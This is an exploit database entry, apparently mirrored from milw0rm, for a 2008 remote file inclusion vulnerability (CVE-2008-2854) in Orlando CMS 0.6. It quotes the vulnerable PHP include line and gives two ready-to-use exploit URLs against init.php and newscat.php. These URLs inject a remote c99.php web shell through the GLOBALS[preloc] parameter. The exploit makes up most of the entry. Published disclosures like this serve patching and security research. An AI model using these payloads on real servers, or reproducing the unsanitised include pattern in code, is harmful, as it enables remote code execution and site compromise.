[] NeoSense

Orlando CMS 0.6 - Remote File Inclusion

Author: Ciph3r
type: webapps
platform: php
port: 
date_added: 2008-06-18 
date_updated: 2016-12-09 
verified: 1 
codes: OSVDB-46788;CVE-2008-2854;OSVDB-46787 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comOrlando.rar

###############################################################
#
# Orlando CMS classes Remote File Include Vulnerabilities
#
###############################################################
#
# Discovered by : Ciph3r
#
#
# MAIL : Ciph3r_blackhat@yahoo.com
#
#
# SP TANX4 : Iranian hacker & Kurdish Security TEAM
#
#
# CLASS : remote
#
# download cms: http://sourceforge.net/project/showfiles.php?group_id=195547
#
################################################################
#
# C0de :
#
#
#  include($GLOBALS['preloc']."modules/core/logger/sticky.php");
#
#
###############################################################

EXPLOIT :

http://127.0.0.1/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?

http://127.0.0.1/cms/Orlando/AJAX/newscat.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?

#####################################################################

# milw0rm.com [2008-06-19]